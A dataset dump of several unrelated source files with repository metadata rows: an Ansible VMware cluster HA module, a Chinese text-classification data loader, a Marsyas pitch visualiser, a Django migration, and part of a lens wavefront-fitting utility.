- If set to C(low), then virtual machine with this priority have a lower chance of powering on after a failure,
when there is insufficient capacity on hosts to meet all virtual machine needs.
type: str
default: 'medium'
choices: [ 'disabled', 'high', 'low', 'medium' ]
advanced_settings:
description:
- A dictionary of advanced HA settings.
default: {}
type: dict
apd_response:
description:
- VM storage protection setting for storage failures categorized as All Paths Down (APD).
type: str
default: 'warning'
choices: [ 'disabled', 'warning', 'restartConservative', 'restartAggressive' ]
version_added: '1.4.0'
pdl_response:
description:
- VM storage protection setting for storage failures categorized as Permenant Device Loss (PDL).
type: str
default: 'warning'
choices: [ 'disabled', 'warning', 'restartAggressive' ]
version_added: '1.4.0'
extends_documentation_fragment:
- community.vmware.vmware.documentation
'''
EXAMPLES = r'''
- name: Enable HA without admission control
community.vmware.vmware_cluster_ha:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
datacenter_name: datacenter
cluster_name: cluster
enable_ha: true
delegate_to: localhost
- name: Enable HA and VM monitoring without admission control
community.vmware.vmware_cluster_ha:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter_name: DC0
cluster_name: "{{ cluster_name }}"
enable_ha: True
ha_vm_monitoring: vmMonitoringOnly
delegate_to: localhost
- name: Enable HA with admission control reserving 50% of resources for HA
community.vmware.vmware_cluster_ha:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
datacenter_name: datacenter
cluster_name: cluster
enable_ha: true
reservation_based_admission_control:
auto_compute_percentages: False
failover_level: 1
cpu_failover_resources_percent: 50
memory_failover_resources_percent: 50
delegate_to: localhost
'''
RETURN = r'''#
'''
try:
from pyVmomi import vim, vmodl
except ImportError:
pass
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.community.vmware.plugins.module_utils.vmware import (
PyVmomi,
TaskError,
find_datacenter_by_name,
vmware_argument_spec,
wait_for_task,
option_diff,
)
from ansible.module_utils._text import to_native
class VMwareCluster(PyVmomi):
def __init__(self, module):
super(VMwareCluster, self).__init__(module)
self.cluster_name = module.params['cluster_name']
self.datacenter_name = module.params['datacenter']
self.enable_ha = module.params['enable_ha']
self.datacenter = None
self.cluster = None
self.host_isolation_response = getattr(vim.cluster.DasVmSettings.IsolationResponse, self.params.get('host_isolation_response'))
if self.enable_ha and (
self.params.get("slot_based_admission_control")
or self.params.get("reservation_based_admission_control")
or self.params.get("failover_host_admission_control")
):
self.ha_admission_control = True
else:
self.ha_admission_control = False
self.datacenter = find_datacenter_by_name(self.content, self.datacenter_name)
if self.datacenter is None:
self.module.fail_json(msg="Datacenter %s does not exist." % self.datacenter_name)
self.cluster = self.find_cluster_by_name(cluster_name=self.cluster_name, datacenter_name=self.datacenter)
if self.cluster is None:
self.module.fail_json(msg="Cluster %s does not exist." % self.cluster_name)
self.advanced_settings = self.params.get('advanced_settings')
if self.advanced_settings:
self.changed_advanced_settings = option_diff(self.advanced_settings, self.cluster.configurationEx.dasConfig.option, False)
else:
self.changed_advanced_settings = None
def get_failover_hosts(self):
"""
Get failover hosts for failover_host_admission_control policy
Returns: List of ESXi hosts sorted by name
"""
policy = self.params.get('failover_host_admission_control')
hosts = []
all_hosts = dict((h.name, h) for h in self.get_all_hosts_by_cluster(self.cluster_name))
for host in policy.get('failover_hosts'):
if host in all_hosts:
hosts.append(all_hosts.get(host))
else:
self.module.fail_json(msg="Host %s is not a member of cluster %s." % (host, self.cluster_name))
hosts.sort(key=lambda h: h.name)
return hosts
def check_ha_config_diff(self):
"""
Check HA configuration diff
Returns: True if there is diff, else False
"""
das_config = self.cluster.configurationEx.dasConfig
if das_config.enabled != self.enable_ha:
return True
if self.enable_ha and (
das_config.vmMonitoring != self.params.get("ha_vm_monitoring")
or das_config.hostMonitoring != self.params.get("ha_host_monitoring")
or das_config.admissionControlEnabled != self.ha_admission_control
or das_config.defaultVmSettings.restartPriority
!= self.params.get("ha_restart_priority")
or das_config.defaultVmSettings.isolationResponse
!= self.host_isolation_response
or das_config.defaultVmSettings.vmToolsMonitoringSettings.vmMonitoring
!= self.params.get("ha_vm_monitoring")
or das_config.defaultVmSettings.vmToolsMonitoringSettings.failureInterval
!= self.params.get("ha_vm_failure_interval")
or das_config.defaultVmSettings.vmToolsMonitoringSettings.minUpTime
!= self.params.get("ha_vm_min_up_time")
or das_config.defaultVmSettings.vmToolsMonitoringSettings.maxFailures
!= self.params.get("ha_vm_max_failures")
or das_config.defaultVmSettings.vmToolsMonitoringSettings.maxFailureWindow
!= self.params.get("ha_vm_max_failure_window")
or das_config.defaultVmSettings.vmComponentProtectionSettings.vmStorageProtectionForAPD
!= self.params.get("apd_response")
or das_config.defaultVmSettings.vmComponentProtectionSettings.vmStorageProtectionForPDL
!= self.params.get("pdl_response")
):
return True
if self.ha_admission_control:
if self.params.get('slot_based_admission_control'):
policy = self.params.get('slot_based_admission_control')
if not isinstance(das_config.admissionControlPolicy, vim.cluster.FailoverLevelAdmissionControlPolicy) or \
das_config.admissionControlPolicy.failoverLevel != policy.get('failover_level'):
return True
elif self.params.get('reservation_based_admission_control'):
policy = self.params.get('reservation_based_admission_control')
auto_compute_percentages = policy.get('auto_compute_percentages')
if not isinstance(das_config.admissionControlPolicy, vim.cluster.FailoverResourcesAdmissionControlPolicy) or \
das_config.admissionControlPolicy.autoComputePercentages != auto_compute_percentages or \
das_config.admissionControlPolicy.failoverLevel != policy.get('failover_level'):
return True
if not auto_compute_percentages:
if das_config.admissionControlPolicy.cpuFailoverResourcesPercent != policy.get('cpu_failover_resources_percent') or \
das_config.admissionControlPolicy.memoryFailoverResourcesPercent != policy.get('memory_failover_resources_percent'):
return True
elif self.params.get('failover_host_admission_control'):
policy = self.params.get('failover_host_admission_control')
if not isinstance(das_config.admissionControlPolicy, vim.cluster.FailoverHostAdmissionControlPolicy):
return True
das_config.admissionControlPolicy.failoverHosts.sort(key=lambda h: h.name)
if das_config.admissionControlPolicy.failoverHosts != self.get_failover_hosts():
return True
if self.changed_advanced_settings:
return True
return False
def configure_ha(self):
"""
Manage HA Configuration
"""
changed, result = False, None
if self.check_ha_config_diff():
if not self.module.check_mode:
cluster_config_spec = vim.cluster.ConfigSpecEx()
cluster_config_spec.dasConfig = vim.cluster.DasConfigInfo()
cluster_config_spec.dasConfig.enabled = self.enable_ha
if self.enable_ha:
vm_tool_spec = vim.cluster.VmToolsMonitoringSettings()
vm_tool_spec.enabled = True
vm_tool_spec.vmMonitoring = self.params.get('ha_vm_monitoring')
vm_tool_spec.failureInterval = self.params.get('ha_vm_failure_interval')
vm_tool_spec.minUpTime = self.params.get('ha_vm_min_up_time')
vm_tool_spec.maxFailures = self.params.get('ha_vm_max_failures')
vm_tool_spec.maxFailureWindow = self.params.get('ha_vm_max_failure_window')
das_vm_config = vim.cluster.DasVmSettings()
das_vm_config.restartPriority = self.params.get('ha_restart_priority')
das_vm_config.isolationResponse = self.host_isolation_response
das_vm_config.vmToolsMonitoringSettings = vm_tool_spec
das_vm_config.vmComponentProtectionSettings = vim.cluster.VmComponentProtectionSettings()
das_vm_config.vmComponentProtectionSettings.vmStorageProtectionForAPD = self.params.get('apd_response')
das_vm_config.vmComponentProtectionSettings.vmStorageProtectionForPDL = self.params.get('pdl_response')
cluster_config_spec.dasConfig.defaultVmSettings = das_vm_config
cluster_config_spec.dasConfig.admissionControlEnabled = self.ha_admission_control
if self.ha_admission_control:
if self.params.get('slot_based_admission_control'):
cluster_config_spec.dasConfig.admissionControlPolicy = vim.cluster.FailoverLevelAdmissionControlPolicy()
policy = self.params.get('slot_based_admission_control')
cluster_config_spec.dasConfig.admissionControlPolicy.failoverLevel = policy.get('failover_level')
elif self.params.get('reservation_based_admission_control'):
cluster_config_spec.dasConfig.admissionControlPolicy = vim.cluster.FailoverResourcesAdmissionControlPolicy()
policy = self.params.get('reservation_based_admission_control')
auto_compute_percentages = policy.get('auto_compute_percentages')
cluster_config_spec.dasConfig.admissionControlPolicy.autoComputePercentages = auto_compute_percentages
cluster_config_spec.dasConfig.admissionControlPolicy.failoverLevel = policy.get('failover_level')
if not auto_compute_percentages:
cluster_config_spec.dasConfig.admissionControlPolicy.cpuFailoverResourcesPercent = \
policy.get('cpu_failover_resources_percent')
cluster_config_spec.dasConfig.admissionControlPolicy.memoryFailoverResourcesPercent = \
policy.get('memory_failover_resources_percent')
elif self.params.get('failover_host_admission_control'):
cluster_config_spec.dasConfig.admissionControlPolicy = vim.cluster.FailoverHostAdmissionControlPolicy()
policy = self.params.get('failover_host_admission_control')
cluster_config_spec.dasConfig.admissionControlPolicy.failoverHosts = self.get_failover_hosts()
cluster_config_spec.dasConfig.hostMonitoring = self.params.get('ha_host_monitoring')
cluster_config_spec.dasConfig.vmMonitoring = self.params.get('ha_vm_monitoring')
if self.changed_advanced_settings:
cluster_config_spec.dasConfig.option = self.changed_advanced_settings
try:
task = self.cluster.ReconfigureComputeResource_Task(cluster_config_spec, True)
changed, result = wait_for_task(task)
except vmodl.RuntimeFault as runtime_fault:
self.module.fail_json(msg=to_native(runtime_fault.msg))
except vmodl.MethodFault as method_fault:
self.module.fail_json(msg=to_native(method_fault.msg))
except TaskError as task_e:
self.module.fail_json(msg=to_native(task_e))
except Exception as generic_exc:
self.module.fail_json(msg="Failed to update cluster"
" due to generic exception %s" % to_native(generic_exc))
else:
changed = True
self.module.exit_json(changed=changed, result=result)
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(dict(
cluster_name=dict(type='str', required=True),
datacenter=dict(type='str', required=True, aliases=['datacenter_name']),
# HA
enable_ha=dict(type='bool', default=False),
ha_host_monitoring=dict(type='str',
default='enabled',
choices=['enabled', 'disabled']),
host_isolation_response=dict(type='str',
default='none',
choices=['none', 'powerOff', 'shutdown']),
advanced_settings=dict(type='dict', default=dict(), required=False),
# HA VM Monitoring related parameters
ha_vm_monitoring=dict(type='str',
choices=['vmAndAppMonitoring', 'vmMonitoringOnly', 'vmMonitoringDisabled'],
default='vmMonitoringDisabled'),
ha_vm_failure_interval=dict(type='int', default=30),
ha_vm_min_up_time=dict(type='int', default=120),
ha_vm_max_failures=dict(type='int', default=3),
ha_vm_max_failure_window=dict(type='int', default=-1),
ha_restart_priority=dict(type='str',
choices=['high', 'low', 'medium', 'disabled'],
default='medium'),
# HA Admission Control related parameters
slot_based_admission_control=dict(type='dict', options=dict(
failover_level=dict(type='int', required=True),
)),
reservation_based_admission_control=dict(type='dict', options=dict(
auto_compute_percentages=dict(type='bool', default=True),
failover_level=dict(type='int', required=True),
cpu_failover_resources_percent=dict(type='int', default=50),
memory_failover_resources_percent=dict(type='int', default=50),
)),
failover_host_admission_control=dict(type='dict', options=dict(
failover_hosts=dict(type='list', elements='str', required=True),
)),
apd_response=dict(type='str',
choices=['disabled', 'warning', 'restartConservative', 'restartAggressive'],
default='warning'),
pdl_response=dict(type='str',
choices=['disabled', 'warning', 'restartAggressive'],
default='warning'),
))
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[
['slot_based_admission_control', 'reservation_based_admission_control', 'failover_host_admission_control']
]
)
vmware_cluster_ha = VMwareCluster(module)
vmware_cluster_ha.configure_ha()
if __name__ == '__main__':
main()
| 46.640472 | 144 | 0.663985 |
ace963823198047a39ba286d4f4816c8a5ada2a5 | 11,598 | py | Python | tc_all/old20190213/loader.py | zjfjf/text_classification_system | 1e89c1afe6b2cef604306590d4605b01b216f306 | [
"MIT"
] | 2 | 2019-03-07T12:56:53.000Z | 2019-03-11T03:06:36.000Z | tc_all/old20190213/loader.py | zjfjf/text_classification_system | 1e89c1afe6b2cef604306590d4605b01b216f306 | [
"MIT"
] | 2 | 2019-03-03T10:04:54.000Z | 2019-03-03T10:06:57.000Z | tc_all/old20190213/loader.py | zjfjf/text_classification_system | 1e89c1afe6b2cef604306590d4605b01b216f306 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#encoding:utf-8
from collections import Counter
import tensorflow.contrib.keras as kr
import numpy as np
import codecs
import re
import sys
#import jieba
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
import Tools
if sys.version_info[0] > 2:
is_py3 = True
else:
reload(sys)
sys.setdefaultencoding("utf-8")
is_py3 = False
def native_word(word, encoding='utf-8'):
"""如果在python2下面使用python3训练的模型,可考虑调用此函数转化一下字符编码"""
if not is_py3:
return word.encode(encoding)
else:
return word
def native_content(content):
if not is_py3:
return content.decode('utf-8')
else:
return content
def open_file(filename, mode='r'):
"""
常用文件操作,可在python2和python3间切换.
mode: 'r' or 'w' for read or write
"""
if is_py3:
return open(filename, mode, encoding='utf-8', errors='ignore')
else:
return open(filename, mode)
def read_file(filename):
"""
Args:
filename:trian_filename,test_filename,val_filename
Returns:
two list where the first is lables and the second is contents cut by jieba
"""
re_han = re.compile(u"([\u4E00-\u9FD5a-zA-Z0-9+#&\._%]+)") # the method of cutting text by punctuation
contents,labels=[],[]
with codecs.open(filename,'r',encoding='utf-8') as f:
for line in f:
try:
line=line.rstrip()
assert len(line.split('\t'))==2
label,content=line.split('\t')
labels.append(label)
blocks = re_han.split(content)
word = []
for blk in blocks:
if re_han.match(blk):
word.extend(jieba.lcut(blk))
contents.append(word)
except:
pass
return labels,contents
def read_myfile(filename):
"""读取文件数据"""
contents, labels = [], []
with open_file(filename) as f:
for line in f:
try:
label, content = line.strip().split('\t')
if content:
contents.append((native_content(content)))
labels.append(native_content(label))
except:
pass
return contents, labels
def build_vocab(filenames,vocab_dir,vocab_size=8000):
"""
Args:
filename:trian_filename,test_filename,val_filename
vocab_dir:path of vocab_filename
vocab_size:number of vocabulary
Returns:
writting vocab to vocab_filename
"""
all_data = []
for filename in filenames:
_,data_train=read_file(filename)
for content in data_train:
all_data.extend(content)
counter=Counter(all_data)
words,_=list(zip(*count_pairs))
words=['<PAD>']+list(words)
with codecs.open(vocab_dir,'w',encoding='utf-8') as f:
f.write('\n'.join(words)+'\n')
def build_myvocab(train_dir, vocab_dir, vocab_size):
"""根据训练集构建词汇表,存储"""
data_train, _ = read_myfile(train_dir)
all_data = []
for line in data_train:
#line = line.decode('utf-8')
line = line.replace('\r\n', '').strip() # 删除换行
line = line.split(',')
all_data.extend(line)
counter = Counter(all_data)
count_pairs = counter.most_common(vocab_size - 1) #key:单词,value:出现次数
words, _ = list(zip(*count_pairs)) #解压,取key
# 添加一个 <PAD> 来将所有文本pad为同一长度
words = ['<PAD>'] + list(words)
open_file(vocab_dir, mode='w').write('\n'.join(words) + '\n')
def build_myvocab_w(train_dir, vocab_dir, vocab_size, train_tfidf_path):
"""根据训练集构建词汇表,存储"""
if train_tfidf_path is not None:
trainbunch = Tools.readbunchobj(train_tfidf_path)
words = trainbunch.vocabulary #导入训练集的TF-IDF词向量空间
'''
#chi 选择特征
train_np = np.array(trainbunch.tdm)
label_np = np.array(trainbunch.labels)
model1 = SelectKBest(chi2, k = vocab_size ) #选择k个最佳特征
words = model1.fit_transform(train_np, label_np)#选择出k个特征
scores = model1.scores_ #得分
'''
# 添加一个 <PAD> 来将所有文本pad为同一长度
words = ['<PAD>'] + list(words)
open_file(vocab_dir, mode='w').write('\n'.join(words) + '\n')
'''
normalization_values = values/max(values)
count_dict = dict(zip(words, normalization_values))
return count_dict
'''
def build_myvocab_all(train_dir, vocab_dir, vocab_size, word2vec_path):
"""根据训练集构建词汇表,存储"""
words = []
file_r = codecs.open(word2vec_path, 'r', encoding='utf-8')
line = file_r.readline()
voc_size, vec_dim = map(int, line.split(' ')) #word2vec的单词总数,词向量维度
line = file_r.readline()
while line:
try:
items = line.split(' ')
word = items[0] #单词
words.append(word)
except:
pass
line = file_r.readline()
# 添加一个 <PAD> 来将所有文本pad为同一长度
words = ['<PAD>'] + list(words)
open_file(vocab_dir, mode='w').write('\n'.join(words) + '\n')
'''
normalization_values = values/max(values)
count_dict = dict(zip(words, normalization_values))
return count_dict
'''
def build_myvocab1(train_dir, vocab_dir, vocab_size):
"""根据训练集构建词汇表,存储"""
train, label = read_myfile(train_dir)
all_data = []
for line in train:
#line = line.decode('utf-8')
line = line.replace('\r\n', '').strip() # 删除换行
line = line.split(',')
all_data.append(line)
print("all_data")
print( len(all_data) )
train_np = np.array(all_data)
label_np = np.array(label)
print("train_np.shape")
print(train_np.shape)
print("label_np.shape")
print(label_np.shape)
model1 = SelectKBest(chi2, k = vocab_size ) #选择k个最佳特征
words = model1.fit_transform(train_np, label_np)#该函数可以选择出k个特征
scores = model1.scores_ #得分
words = words.tolist()
scores = scores.tolist()
print(len(words))
print(len(scores))
dictscores = dict(zip(words, scores))
# 添加一个 <PAD> 来将所有文本pad为同一长度
words = ['<PAD>'] + list(words)
open_file(vocab_dir, mode='w').write('\n'.join(words) + '\n')
return dictscores
def chi(x_train, y_train, feature_size):
train_np = np.array(x_train)
label_np = np.array(y_train)
print("train_np.shape")
print(train_np.shape)
print("label_np.shape")
print(label_np.shape)
model1 = SelectKBest(chi2, k = feature_size ) #选择k个最佳特征
words = model1.fit_transform(train_np, label_np)#该函数可以选择出k个特征
scores = model1.scores_ #得分
words = words.tolist()
scores = scores.tolist()
print(len(words))
print(len(scores))
dictscores = dict(zip(words, scores))
def read_vocab(vocab_dir):
"""
Args:
filename:path of vocab_filename
Returns:
words: a list of vocab
word_to_id: a dict of word to id
"""
words=codecs.open(vocab_dir,'r',encoding='utf-8').read().strip().split('\n')
word_to_id=dict(zip(words,range(len(words))))
return words,word_to_id
def read_myvocab(vocab_dir):
"""读取词汇表"""
# words = open_file(vocab_dir).read().strip().split('\n')
with open_file(vocab_dir) as fp:
# 如果是py2 则每个值都转化为unicode
words = [native_content(_.strip()) for _ in fp.readlines()]
word_to_id = dict(zip(words, range(len(words))))
return words, word_to_id
def read_category():
"""
Args:
None
Returns:
categories: a list of label
cat_to_id: a dict of label to id
"""
categories = ['体育', '财经', '房产', '家居', '教育', '科技', '时尚', '时政', '游戏', '娱乐']
cat_to_id=dict(zip(categories,range(len(categories))))
return categories,cat_to_id
def read_mycategory():
"""读取分类目录,固定"""
#categories = ['体育', '财经', '房产', '家居', '教育', '科技', '时尚', '时政', '游戏', '娱乐']
categories = ['IT', '体育', '军事', '娱乐', '文化', '时政', '汽车', '金融']
categories = [native_content(x) for x in categories]
cat_to_id = dict(zip(categories, range(len(categories))))
return categories, cat_to_id
def process_file(filename,word_to_id,cat_to_id,max_length=600):
"""
Args:
filename:train_filename or test_filename or val_filename
word_to_id:get from def read_vocab()
cat_to_id:get from def read_category()
max_length:allow max length of sentence
Returns:
x_pad: sequence data from preprocessing sentence
y_pad: sequence data from preprocessing label
"""
labels,contents=read_file(filename)
data_id,label_id=[],[]
for i in range(len(contents)):
data_id.append([word_to_id[x] for x in contents[i] if x in word_to_id])
label_id.append(cat_to_id[labels[i]])
x_pad=kr.preprocessing.sequence.pad_sequences(data_id,max_length,padding='post', truncating='post')
y_pad=kr.utils.to_categorical(label_id, num_classes=len(cat_to_id))
return x_pad,y_pad
def myprocess_file(filename, word_to_id, cat_to_id, max_length):
"""将文件转换为id表示"""
contents, labels = read_myfile(filename)
print(len(contents))
print(len(labels))
'''
for i in cat_to_id:
print(i+ '\n')
'''
data_id, label_id = [], []
for i in range(len(contents)):
data_id.append([word_to_id[x] for x in contents[i] if x in word_to_id])
label_id.append(cat_to_id[labels[i]])
# 使用keras提供的pad_sequences来将文本pad为固定长度
x_pad = kr.preprocessing.sequence.pad_sequences(data_id, max_length)
y_pad = kr.utils.to_categorical(label_id, num_classes=len(cat_to_id)) # 将标签转换为one-hot表示
return x_pad, y_pad
def batch_iter(x, y, batch_size=64):
"""
Args:
x: x_pad get from def process_file()
y:y_pad get from def process_file()
Yield:
input_x,input_y by batch size
"""
data_len=len(x)
num_batch=int((data_len-1)/batch_size)+1
indices=np.random.permutation(np.arange(data_len))
x_shuffle=x[indices]
y_shuffle=y[indices]
for i in range(num_batch):
start_id=i*batch_size
end_id=min((i+1)*batch_size,data_len)
yield x_shuffle[start_id:end_id],y_shuffle[start_id:end_id]
def mybatch_iter(x, y, batch_size=64):
"""生成批次数据"""
data_len = len(x)
num_batch = int((data_len - 1) / batch_size) + 1
indices = np.random.permutation(np.arange(data_len))
x_shuffle = x[indices]
y_shuffle = y[indices]
for i in range(num_batch):
start_id = i * batch_size
end_id = min((i + 1) * batch_size, data_len)
yield x_shuffle[start_id:end_id], y_shuffle[start_id:end_id]
#将词向量矩阵(txt)转化为numpy file
def export_word2vec_vectors(vocab, word2vec_path,trimmed_filename):
"""
Args:
vocab: word_to_id
word2vec_path: file path of have trained word vector by word2vec
trimmed_filename: file path of changing word_vector to numpy file
Returns:
save vocab_vector to numpy file
"""
file_r = codecs.open(word2vec_path, 'r', encoding='utf-8')
line = file_r.readline()
voc_size, vec_dim = map(int, line.split(' ')) #word2vec的单词总数,词向量维度
embeddings = np.zeros([len(vocab), vec_dim]) #embedding矩阵初始化为0 len(vocab)*vec_dim
line = file_r.readline()
while line:
try:
items = line.split(' ')
word = items[0] #单词
vec = np.asarray(items[1:], dtype='float32') #词向量
if word in vocab: #如果word在词汇表vocab中
word_idx = vocab[word] #word对应的id
embeddings[word_idx] = np.asarray(vec) #将embeddings矩阵word id对应的一行由0改为词向量
except:
pass
line = file_r.readline()
np.savez_compressed(trimmed_filename, embeddings=embeddings)#将embeddings矩阵存储为numpy数组
#将词向量矩阵(txt)转化为numpy file
def export_word2vec_vectors_w(vocab, word2vec_path, trimmed_filename):
"""
Args:
vocab: word_to_id
word2vec_path: file path of have trained word vector by word2vec
trimmed_filename: file path of changing word_vector to numpy file
Returns:
save vocab_vector to numpy file
"""
file_r = codecs.open(word2vec_path, 'r', encoding='utf-8')
line = file_r.readline()
voc_size, vec_dim = map(int, line.split(' ')) #word2vec的单词总数,词向量维度
embeddings = np.zeros([len(vocab), vec_dim]) #embedding矩阵初始化为0 len(vocab)*vec_dim
line = file_r.readline()
while line:
try:
items = line.split(' ')
word = items[0] #单词
vec = np.asarray(items[1:], dtype='float32') #词向量
if word in vocab: #如果word在词汇表vocab中
word_idx = vocab[word] #word对应的id
#score = dictscores[word] #word对应的chi score
embeddings[word_idx] = np.asarray(vec) #将embeddings矩阵word id对应的一行由0改为词向量
except:
pass
line = file_r.readline()
#考虑上下文位置,t-1,t,t+1 相加求平均
np.savez_compressed(trimmed_filename, embeddings=embeddings)#将embeddings矩阵存储为numpy数组
def get_training_word2vec_vectors(filename):
"""
Args:
filename:numpy file
Returns:
data["embeddings"]: a matrix of vocab vector
"""
with np.load(filename) as data:
return data["embeddings"]
| 27.746411 | 104 | 0.707622 |
ace9647b8c9313946e9d91fc2f215256be709433 | 1,826 | py | Python | marsyas-vamp/marsyas/src/marsyas_python/pitchBall.py | jaouahbi/VampPlugins | 27c2248d1c717417fe4d448cdfb4cb882a8a336a | [
"Apache-2.0"
] | null | null | null | marsyas-vamp/marsyas/src/marsyas_python/pitchBall.py | jaouahbi/VampPlugins | 27c2248d1c717417fe4d448cdfb4cb882a8a336a | [
"Apache-2.0"
] | null | null | null | marsyas-vamp/marsyas/src/marsyas_python/pitchBall.py | jaouahbi/VampPlugins | 27c2248d1c717417fe4d448cdfb4cb882a8a336a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# This is an ambient sound analyzer that will:
# - Get sound from the microphone
# - Show a graphical representation of the parameters of that sound
from pylab import *
from marsyas import *
from marsyas_util import *
from visual import *
# For step one, we will create the following marsyas network:
# ADC ==> pitch extractor ==> output1
spec = ["Series/system", ["AudioSource/asrc", "AubioYin/pitcher"]];#"SoundFileSink/dest"]];#, "AubioYin/pitcher"]];
#spec = ["Series/system", ["AudioSource/asrc", "Rms/pitcher"]];#"SoundFileSink/dest"]];#, "AubioYin/pitcher"]];
net = create(spec)
# We will configure the network:
gain = 1.0;
sropt = 44100.0;
copt = 1;
net.updControl("mrs_natural/inSamples", 2048);
net.updControl("mrs_real/israte", sropt);
net.updControl("AudioSource/asrc/mrs_natural/nChannels", copt);
net.updControl("AudioSource/asrc/mrs_real/gain", gain);
net.updControl("AudioSource/asrc/mrs_bool/initAudio", marsyas.MarControlPtr.from_bool(True));
#net.updControl("AubioYin/pitcher/mrs_real/tolerance", 0.3);
#net.updControl("SoundFileSink/dest/mrs_string/filename", "test.wav");
# Now, we should have some visualization tool. This program uses the visual python library to work that out, so:
ball = sphere(pos = (0, 0, 0), radius = 1, color = (1, 0, 0))
# This program will do the following:
# Tick the network
# Low-pass the output using a exponent-decay filter with known coefficient
# Color the sphere so it is brighter for trebble sounds
filteredout = 0;
alpha = 0.9;
#print "GO GO GO!"
while 1:
net.tick();
# We will link a variable to the output control...
output = net.getControl("mrs_realvec/processedData").to_realvec()
filteredout = filteredout*alpha + (1-alpha)*output[0]
print output[0], filteredout
red = output[0]/1000.0;
ball.color = vector(1-red, red, 0);
| 34.45283 | 115 | 0.72782 |
ace964c4295160cd037643e51eb7a11fc27dd37e | 645 | py | Python | matches/migrations/0001_initial.py | asyler/betleague | 2ae43ae26d6a6c8582a831bc56c2144ed3134202 | [
"MIT"
] | null | null | null | matches/migrations/0001_initial.py | asyler/betleague | 2ae43ae26d6a6c8582a831bc56c2144ed3134202 | [
"MIT"
] | 1 | 2017-12-14T07:42:02.000Z | 2017-12-14T10:22:19.000Z | matches/migrations/0001_initial.py | asyler/betleague | 2ae43ae26d6a6c8582a831bc56c2144ed3134202 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-20 13:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Match',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('home_team', models.TextField()),
('away_team', models.TextField()),
('datetime', models.DateTimeField()),
],
),
]
| 25.8 | 114 | 0.570543 |
ace9655c866450aaaf02551d8c8eacdd1b8c67cc | 12,425 | py | Python | lentil/wavefront_utils.py | samkberry/lentil | 161b64449cd0f2278af9554ba2a7d6b2da0e532b | [
"BSD-3-Clause"
] | 2 | 2021-12-17T08:49:40.000Z | 2021-12-18T11:56:39.000Z | lentil/wavefront_utils.py | samkberry/lentil | 161b64449cd0f2278af9554ba2a7d6b2da0e532b | [
"BSD-3-Clause"
] | null | null | null | lentil/wavefront_utils.py | samkberry/lentil | 161b64449cd0f2278af9554ba2a7d6b2da0e532b | [
"BSD-3-Clause"
] | null | null | null | import random
import multiprocessing
import lentil.constants_utils
from lentil.constants_utils import *
from lentil.focus_set import FocusSet, read_wavefront_data
# from lentil.focus_set import estimate_focus_jitter
# use_cuda = wavefront_config.USE_CUDA
from lentilwave.encode_decode import convert_wavefront_dicts_to_p_dicts
from lentilwave import config, TestSettings, TestResults
from lentilwave.generation import generate
class TerminateOptException(Exception):
pass
def cauchy_fit(x, y):
meanpeak_idx = np.argmax(y)
meanpeak_pos = x[meanpeak_idx]
meanpeak = y[meanpeak_idx]
# highest_data_y = y_values[highest_data_x_idx]
# print(highest_data_x_idx)
if meanpeak_idx > 0:
x_inc = x[meanpeak_idx] - x[meanpeak_idx - 1]
else:
x_inc = x[meanpeak_idx + 1] - x[meanpeak_idx]
# y_values = np.cos(np.linspace(-6, 6, len(x))) + 1
absgrad = np.abs(np.gradient(y)) / meanpeak
gradsum = np.cumsum(absgrad)
distances_from_peak = np.abs(gradsum - np.mean(gradsum[meanpeak_idx:meanpeak_idx + 1]))
shifted_distances = interpolate.InterpolatedUnivariateSpline(x, distances_from_peak, k=1)(
x - x_inc * 0.5)
weights = np.clip(1.0 - shifted_distances * 1.3, 1e-1, 1.0) ** 5
fitfn = cauchy
optimise_bounds = fitfn.bounds(meanpeak_pos, meanpeak, x_inc)
sigmas = 1. / weights
initial = fitfn.initial(meanpeak_pos, meanpeak, x_inc)
fitted_params, _ = optimize.curve_fit(fitfn, x, y,
bounds=optimise_bounds, sigma=sigmas, ftol=1e-5, xtol=1e-5,
p0=initial)
return fitted_params
def get_weights(shape, focus_values, centre):
focus_deviations = np.abs(focus_values - centre)
max_focus_deviation = focus_deviations.max()
focusweights = 1.0 - focus_deviations / max_focus_deviation * (1.0 - config.EXTREME_FOCUS_WEIGHT)
freqrange = config.HIGH_FREQUENCY_WEIGHT
freqweights = np.linspace(1.0, freqrange, shape[0]).reshape((shape[0], 1))
expanded = np.repeat(focusweights[np.newaxis, :], shape[0], axis=0)
weights = expanded * freqweights
return weights ** 2
def _process_focusset(num):
# ob_ = 2
# fs_slices_ = 0
# skip_ = 0
focusset = focussets_[num]
if type(focusset) is str:
focusset = FocusSet(rootpath=focusset, use_calibration=True, include_all=True, load_complex=complex_otf_)
return_focusset = True
else:
return_focusset = False
wfd = [("", {})]
ps = None
if not from_scratch_ and num == 0:
wfd = focusset.read_wavefront_data(overwrite=True, x_loc=x_loc_, y_loc=y_loc_)
if wfd[-1][1] != {}:
try:
ps = convert_wavefront_dicts_to_p_dicts(wfd[-1][1])
p = ps[0]
if 'df_step' in ps[0] and 'df_offset' in ps[0]:
hints_needed = False
else:
hints_needed = True
except IndexError:
p = None
hints_needed = True
else:
p = None
hints_needed = True
elif not from_scratch_ and all_ps_ is not None:
try:
p = all_ps_[num]
hints_needed = False
except IndexError:
hints_needed = True
else:
hints_needed = True
# print("wfd ", wfd)
data = lentil.constants_utils.FocusSetData()
data.wavefront_data = wfd
sag_ob = focusset.get_interpolation_fn_at_point(IMAGE_WIDTH / 2, IMAGE_HEIGHT / 2, AUC, SAGITTAL)
focus_values = sag_ob.focus_data[:]
if hints_needed:
tup = focusset.find_best_focus(IMAGE_WIDTH / 2, IMAGE_HEIGHT / 2, axis=MERIDIONAL, _return_step_data_only=True,
_step_estimation_posh=True)
